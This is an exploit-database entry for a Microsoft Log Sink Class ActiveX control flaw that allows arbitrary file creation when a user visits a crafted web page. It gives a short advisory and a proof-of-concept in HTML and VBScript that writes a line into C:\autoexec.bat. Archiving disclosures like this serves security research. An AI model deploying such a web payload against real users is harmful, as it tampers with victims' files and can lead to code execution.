[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation

Author: Shane Hird
type: remote
platform: windows
port: 
date_added: 2003-04-29 
date_updated: 2013-05-02 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/12646/info

Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.

A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.

<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.